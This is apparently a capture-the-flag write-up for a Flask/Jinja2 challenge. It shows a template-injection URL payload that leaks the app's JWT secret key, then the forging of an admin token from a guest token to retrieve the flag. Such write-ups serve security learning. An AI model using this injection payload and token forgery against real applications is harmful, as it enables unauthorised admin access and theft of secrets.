Tags: flask ssti web jinja2 jwt 

Rating:

if we login as guest , we'll got a jwt token
```
"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1ODQ2MzE1MzksIm5iZiI6MTU4NDYzMTUzOSwianRpIjoiMTVlYjM3NGQtNjM2MS00YTViLWJkOWMtYWRlMTA1NGRhMWJmIiwiaWRlbnRpdHkiOiJndWVzdCIsImZyZXNoIjpmYWxzZSwidHlwZSI6ImFjY2VzcyJ9.uL2EnxrI-nmAivK526z1WW5pYCbuM1m0DnSt80Ua8t8"
```
also we can find jwt secret key with jinja ssti payload:
```
http://66.172.11.208:5000/{{config.get('JWT_SECRET_KEY')}}
this_is_a_$uper_secure_key
```
now we can decode/encode token with https://github.com/noraj/flask-session-cookie-manager or https://www.jsonwebtoken.io/ and secret:
```
{
"iat": 1584631539,
"nbf": 1584631539,
"jti": "15eb374d-6361-4a5b-bd9c-ade1054da1bf",
"identity": "guest",
"fresh": false,
"type": "access",
"exp": 1584636088
}
```
so we should change ```guest``` to ```admin```
```
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1ODQ2MzE1MzksIm5iZiI6MTU4NDYzMTUzOSwianRpIjoiMTVlYjM3NGQtNjM2MS00YTViLWJkOWMtYWRlMTA1NGRhMWJmIiwiaWRlbnRpdHkiOiJhZG1pbiIsImZyZXNoIjpmYWxzZSwidHlwZSI6ImFjY2VzcyIsImV4cCI6MTU4NDYzNjI2MH0.oxecwSBNV1ForC6hwNTZTkLQUvDL1odm2z1dcfNdc0E
```
then request flag with this token
```
SUSEC{server_$ide_R3ND3R!NG_is_a_bad_idea}
```